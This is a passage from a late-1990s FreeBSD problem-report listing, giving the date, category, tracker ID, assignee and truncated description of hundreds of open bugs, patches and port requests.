an o [1999/12/12] ports/15438 ports p5-GD port update (1.18 -> 1.23) o [1999/12/12] ports/15442 ports upgrade of nethack port to 3.2.3, which h o [1999/12/12] kern/15446 Unpredictable enabling of SCSI Tagged Que o [1999/12/12] bin/15450 The name of the tagfile is left in the pa o [1999/12/12] kern/15452 getfh syscall is only installed with NFS o [1999/12/13] i386/15460 Installation with Compaq SMART-2DH Array o [1999/12/13] bin/15471 Fix several buffer overflows o [1999/12/13] kern/15475 pppd(8) sets the Source Address field of o [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/14] kern/15486 Attempt to write to a "write-prot" floppy o [1999/12/15] kern/15494 over-natd connections hang if MTUs are di o [1999/12/15] kern/15508 disk usage after "strip" is wrong o [1999/12/16] kern/15513 kernel or ipfw drops rules sometimes o [1999/12/16] misc/15515 Firewall/FIltering Problems o [1999/12/16] ports/15518 ports Patch to make xsoldier setgid games inste o [1999/12/16] bin/15520 mktime() fails under certain conditions o [1999/12/16] misc/15521 anoncvs.freebsd.org doesn't work per http o [1999/12/16] ports/15523 ports Motif/Lesstif not found when grace-5.0.3g o [1999/12/16] ports/15524 ports ports audio dap-2.0.2 MD5 probrem o [1999/12/17] ports/15540 ports Update mod_dav to version 0.9.14 o [1999/12/17] ports/15541 ports KDE screen saver with password protection o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/17] ports/15543 ports Samba + DHCP = UNKNOWN HOST NAME o [1999/12/17] i386/15548 Intel EtherExpress Pro/10+: Only 1024 byt o [1999/12/18] i386/15553 Linux Emulation don't emulate accept(2) e o [1999/12/18] kern/15554 malloc fails in OMAGIC programs o [1999/12/19] misc/15571 jkh Installer doesn't know about wd* -> ad* c o [1999/12/20] bin/15581 ftp(1) file completion does not work if s 757 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' o [1995/07/09] misc/605 wpaul NIS: get*bynis routine problems s [1995/08/05] gnu/655 ld -r of shared objects worked in 1.1.5, s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/10/03] kern/765 umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu o [1995/11/30] bin/854 dg swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] kern/1090 iostat displays incorrect sps count s [1996/03/20] bin/1093 route's diagnostic is weird o [1996/04/06] kern/1119 dg Mounted EXT2FS partition is not cleanly u s [1996/06/11] bin/1312 automounter hangs on boot s [1996/06/13] bin/1320 dump limits blocksize to 32K s [1996/07/07] bin/1375 jraynard Extraneous warning from mv(1) [PATCH] o [1996/07/24] misc/1428 ncurses doesn't always display ALTCHARSET s [1996/09/08] bin/1589 [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize o [1996/09/23] i386/1671 joerg s2 map in pcvt isn't ISO 8859-1 and claim s [1996/10/13] misc/1791 syslimits.h does not allow overriding def o [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/10/24] bin/1881 file(1) misidentifies Sun3/m68k executabl s [1996/11/01] bin/1941 danny wtmp and monthly rotation s [1996/11/01] bin/1943 route(8) args s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/06] bin/1970 csh limtail() bug s [1996/11/16] bin/2036 cpio size wraparound s [1996/11/19] bin/2061 DEBUG_FLAGS in bsd.lib.mk is broken s [1996/11/19] bin/2065 in tzsetup/sysinstall, allow user to type s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/11/28] bin/2119 [PATCH] mount lies to child about argv0, s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/17] i386/2239 jmg some interrupts take too long (i.e. BT946 a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1996/12/29] bin/2315 peter tail segfaults on NFS permission denied s [1996/12/30] kern/2327 [PATCH] `Green' saver for pcvt o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/14] kern/2492 AIMS Lab RadioTrack driver for FreeBSD 2. o [1997/01/26] i386/2598 ep0 in EISA mode hangs if ep0-device (ISA o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/01/28] bin/2604 dufault Added POSIX.4/POSIX.1b shm_open()/shm_unl o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/05] bin/2668 modification suggested for rarpd o [1997/02/14] bin/2737 yppasswd fails to change password on a su o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2857 DE500 board exhibits capture effect o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] docs/2897 steve send-pr categories should be explained so o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/18] misc/3024 make reinstall in /usr/src requires writa o [1997/03/22] kern/3061 route does not accept -genmask o [1997/03/31] gnu/3157 Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] kern/3281 errors when "rm -r"-ing in a mounted ext2 o [1997/04/14] kern/3282 ext2fs causes fs-unmount at shutdown/rebo o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/14] kern/3287 [PATCH] missing symbols in /usr/src/sys/i o [1997/04/15] kern/3299 /dev/console hangs o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/27] bin/3399 mv of symbolic link can move directory in o [1997/04/29] bin/3416 ibcs emulation problems o [1997/05/05] i386/3504 [PATCH] New features (and manpage) for ne o [1997/05/08] gnu/3552 the -L option of tar does not work proper s [1997/05/09] kern/3571 Mounted ext2 prevents umount of filesyste o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/05/17] kern/3611 Internal CPU cache on CyrixiInstead DX2 d o [1997/05/20] docs/3645 torstenb TCP_wrappers package doesn't mention wher s [1997/05/22] kern/3667 [PATCH] make vn LKM'able. o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/14] bin/3866 rcs2log fails with eastern timezones o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/24] kern/3944 if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side a [1997/06/25] kern/3953 kern-config: options PANIC_REBOOT_WAIT_TI o [1997/06/26] i386/3962 print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/06/29] ports/3983 fenner New port: psf toolkit o [1997/07/07] kern/4051 pppd connect 'chat ...' broken s [1997/07/07] kern/4052 VJ compression drops packets with IP+TCP o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to o [1997/07/23] kern/4153 New tcp initial send sequence number code s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print f [1997/07/26] bin/4172 suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/04] conf/4229 Ethernet interface unreachable on bootup o [1997/08/06] bin/4238 chpass only occasionally works in conjunc o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/07] bin/4247 modification to /etc/security for FreeBSD o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/22] ports/4356 erich sudo shouldn't block signals in tgetpass( o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/04] misc/4468 dlopen is not available from static execu o [1997/09/07] bin/4484 peter sendmail is barfing o [1997/09/13] kern/4528 processes hang if the mount_portal proces a [1997/09/14] i386/4538 sos byteswapped ATAPI id strings o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord o [1997/09/16] misc/4556 make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/05] bin/4697 make doesn't handle dependencies with for o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/02] bin/4923 vi leaves the screen in standout mode o [1997/11/07] bin/4969 cdcontrol plays incorrect audio tracks in o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/11] kern/5011 rndcontrol -s 8 causes kernel panic o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/13] ports/5034 ache (tcsh) blocked write on named pipe sticks o [1997/11/14] kern/5040 Support for "SCSI-0" devices o [1997/11/14] kern/5048 Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/15] kern/5060 Kernel doesn't compile with mss o [1997/11/20] kern/5108 pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM o [1997/11/26] misc/5153 jkh release file checksums in wrong file s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial o [1997/12/09] bin/5263 sh bug (with example) s [1997/12/11] kern/5275 [PATCH] Added volume (barcode) support to o [1997/12/14] conf/5292 master.passwd -- /nonexistent vs. /sbin/n s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 silo overflows running o [1998/01/02] bin/5410 pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted s [1998/01/16] kern/5510 sos [PATCH] Incomplete ATAPI diagnostic at bo o [1998/01/18] kern/5517 Recursive NULLFS mount causes ufs_ihashge s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/21] bin/5537 vi dumps core with dodgy exrc file o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir a [1998/02/02] ports/5626 billf 'ldap' port eats all available CPU time o [1998/02/02] kern/5627 Tertiary/Quaternary IDE Ctlrs: A few kern f [1998/02/05] misc/5662 sysinstall generates short dev names for o [1998/02/06] bin/5666 ifconfig fails to add alias o [1998/02/06] kern/5672 Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5711 bin/cat code cleanup o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/10] bin/5717 pw -D -g "" returns error o [1998/02/10] bin/5718 pkg_delete refuses to run as non-root o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/15] bin/5758 sys/resources.h doesn't include sys/time. o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] ports/5788 joerg pcemu harddisk-access fixes o [1998/02/19] kern/5789 wcd0 requires ATAPI_STATIC o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w o [1998/02/25] gnu/5841 installmost or install (world) of tmac fa o [1998/02/25] bin/5847 Makeworld fails if CXXFLAGS is set. s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/01] ports/5884 dburr New port: icqjava-0.981a (net/icqjava) o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/08] bin/5944 cvs doesn't work correct. o [1998/03/10] ports/5972 andreas x11/fvwm95 requiring gsm, and rplay is a o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/12] gnu/5992 cvs y2k o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/18] misc/6060 peter Sendmail executable, not doing MASQUERADE o [1998/03/22] conf/6096 /sys/i386/conf/LINT: edit(???) sound_conf o [1998/03/22] gnu/6107 gdb should support PRINTF_HAS_LONG_LONG o [1998/03/28] bin/6156 Patches to make dump understand ENOSPC o [1998/03/28] bin/6161 2.2.6 kerberos servers are awfully visibl o [1998/03/29] ports/6170 peter another squid ports o [1998/03/30] ports/6181 ports New port: xoj-1.0 o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/03] bin/6206 Enhancements to the shutdown program o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/04] bin/6214 ping sometimes cannot be killed with a Co o [1998/04/05] conf/6220 Too few ttyv devices in the -RELEASE syst s [1998/04/06] bin/6223 PST/DST bug in /bin/date o [1998/04/06] ports/6230 rse gfont_mkgdf calls wrong interpreter o [1998/04/06] bin/6234 ypserv -d is broken f [1998/04/07] kern/6247 Gravis UltraSound Classic no longer works o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification s [1998/04/16] ports/6315 kuriyama new port request: korean/htm o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to o [1998/04/20] bin/6359 routed does sent router discovry solicita s [1998/04/20] bin/6371 [PATCH?] fetch(1) uses HTTP_PROXY for ftp a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf o [1998/04/28] ports/6445 jkoshy New port: `fhist' o [1998/04/30] kern/6464 tcpdump doesn't recognize tun0 when it's o [1998/05/03] kern/6495 Need pci_unmap_mem and pci_unmap_port rou s [1998/05/04] bin/6509 [ALMOST PATCH] Allow dd to seek/skip to o s [1998/05/05] bin/6521 [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/07] ports/6546 ache 3line ansi prompt in tcsh: cursor disappe o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/16] bin/6658 [PATCH] -stable getcwd(3) performs unnece s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6760 can't compile kernel w/o networking o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags f [1998/05/31] ports/6813 fenner patched audio module for vat port o [1998/06/01] ports/6815 torstenb ssh lookup ignores second IP address o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani s [1998/06/19] bin/6995 [patch] Minor flaw in fdformat s [1998/06/19] bin/6997 [patch] vnconfig "open" error message con s [1998/06/21] kern/7014 [PATCH][STABLE] Add support for SiS 5591 o [1998/06/22] bin/7021 asami Size estimation patches to pkg_* o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] kern/7029 gibbs cdrecord and aic7880 troubles f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br f [1998/06/25] bin/7068 markm /usr/bin/perl: library path addition s [1998/06/28] kern/7095 [stable] Gravis MAX in 2.2.6 suffers from s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/02] kern/7146 The PCCARD doesnt recognize cards in top s [1998/07/06] bin/7184 /usr/games/robots fails to write high sco s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel f [1998/07/10] misc/7239 ping(8) and traceroute(8) may report erra o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/14] ports/7283 ache tcsh / LC_CTYPE - obscure problem. o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad o [1998/07/21] bin/7352 libc generates spurious warnings when use a [1998/07/23] ports/7375 dburr New port request: audio/xsplay f [1998/07/23] kern/7377 we have a new digiboard driver supporting a [1998/07/31] docs/7456 doc dialog(3) man page outdated o [1998/08/01] ports/7464 dburr New port: WMakerconf o [1998/08/03] ports/7485 ports New port: Xterminal-0.2 s [1998/08/09] kern/7546 [PATCH] [STABLE ?]shutdown -p - system po f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace o [1998/08/14] kern/7619 odd nfs server not responding messages ap o [1998/08/16] ports/7628 dburr new port: sajber-jukebox o [1998/08/16] bin/7632 Race condition in /stand/sysinstall f [1998/08/16] i386/7633 panic: page fault on install with boot.fl s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7680 billf New port of tn5250 o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/20] bin/7694 bogus error-message from route(8) o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/08/29] ports/7774 torstenb sshd doesn't refuse to login people with o [1998/08/29] bin/7779 [PATCH] modload should detect stripped ke o [1998/08/30] kern/7782 Kernel rebuild not correctly responding t o [1998/08/30] bin/7786 quota.h has superfluous semicolon in macr o [1998/09/01] gnu/7800 tar(1) does not recognize --gunzip option o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7826 ls(1) knows too much about format of strf o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/07] ports/7845 tg Unbuffered /dev/vx0-output from Python 1. o [1998/09/07] misc/7850 lt_LT.* locale o [1998/09/07] kern/7856 Patches to add lkm hooks to cmsg_data anc o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/08] bin/7869 Improved error messages from apm o [1998/09/09] misc/7873 poor initial configuration and documentat o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/11] kern/7903 unmatched '{}' blocks. o [1998/09/15] ports/7932 torstenb man zshall doesn't work o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac o [1998/09/20] bin/7998 pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m o [1998/09/21] kern/8015 [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/02] i386/8131 [patch] Support for PCI NE2000 compatible o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] bin/8134 End of game is not recognised immediately o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d o [1998/10/04] bin/8142 freebsd 2.2.7 implementation of key(1) [s o [1998/10/04] i386/8146 [patch] kzipboot serial console setup and a [1998/10/06] bin/8163 [patch] It is impossible to assign quotas o [1998/10/06] i386/8171 [patch] Intel EtherExpress Pro 100 suppor o [1998/10/07] misc/8202 semop() is not wrapped for thread safety o [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] bin/8347 /usr/lib/compat build issues in 3.0 RELEA o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore f [1998/10/17] misc/8357 Segmentation fault while making SWARM-1.3 o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/25] kern/8444 hm pcvt with more than 8 virtual consoles o [1998/10/25] docs/8445 doc Update of "Installing Mathematica on Free o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/10/30] bin/8501 snake has a segmentation fault depending o [1998/10/30] conf/8517 rc.conf/rc fails to set ldconfig -aout o [1998/10/31] misc/8519 Murphy's Laws o [1998/11/01] conf/8531 sysinstall on 3.0-RELEASE (and 3.0-curren o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/04] i386/8571 Bug in config utility in FreeBSD 2.2.6-RE o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/08] kern/8605 ipsec for ipv4, new version o [1998/11/08] ports/8620 asami New option to colorls - -K, color only to o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/14] bin/8681 other macro name that has same number is o [1998/11/18] ports/8754 se KDE: KDM Display Manager has login proble o [1998/11/18] bin/8756 'pw' command additional feature request o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/22] bin/8809 fdisk calls QNX-4 partitions unknown o [1998/11/22] bin/8811 Problem to use 'NLSMODE' variable in Make a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1998/11/27] i386/8867 /stand/sysinstall core dumps (signal 11) o [1998/11/29] kern/8895 DEC 21152 PCI-PCI bridge chip isn't probe o [1998/11/29] kern/8898 PCI devices without an associated driver o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] i386/8923 ctm 2.2.5 -> 2.2.7 error hu_HU.ISO_8859- o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/03] i386/8953 BINFORMAT not defined in 2.2-STABLE o [1998/12/03] bin/8955 request CVS allow advisory locks on repos o [1998/12/06] misc/8986 install-info breaks installworld over nfs o [1998/12/06] bin/8989 (patch) chflags support for mtree(8) o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/10] conf/9051 2.2.8R boot floppy won't write to fixit f o [1998/12/11] bin/9055 When used without arguments, ``set'' and a [1998/12/12] bin/9064 n_hibma [PATCH] propose adding `direct' option in o [1998/12/14] bin/9078 tunefs cant access mounted devices (vs. m o [1998/12/15] kern/9092 DELF raid volumes cause panics under CAM o [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/17] bin/9118 default install of aout compat libs is in o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/21] conf/9160 /etc/services file corruption o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/23] kern/9183 newton chroot(2) can be broken by the superuser. o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() o [1998/12/27] bin/9206 sysinstall installation should create /st f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/28] bin/9226 telnetd can log wrong IP address to utmp o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1998/12/30] conf/9245 obsolete locale setting in /usr/src/etc/{ o [1998/12/30] conf/9246 allscreens_flags in /etc/rc.conf not work o [1998/12/30] bin/9250 [PATCH] allow fetch to do ftp directory l o [1998/12/31] i386/9257 fpathconf() missing from libc_r o [1998/12/31] bin/9259 allow no prompt for yes in fdformat, but o [1999/01/02] bin/9281 awk asumes memory that is returned from m o [1999/01/03] ports/9286 andreas Patch for games/nethack-qt to fix compila o [1999/01/03] ports/9289 kris New Port - ASPostit (Dockable version of o [1999/01/04] kern/9316 Intel PILA8461 NIC panics 2.2.7 during pr o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/05] i386/9341 tty-level buffer overflows o [1999/01/06] docs/9352 hoek wrong macro names in groff_[ms|mm|mmse].7 f [1999/01/07] bin/9374 roberto Improved functionality for find(1) o [1999/01/08] conf/9388 magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl f [1999/01/10] ports/9425 se KDE starting up from xdm has problem.... o [1999/01/13] bin/9470 aout-to-elf-build broken with kerberosIV- 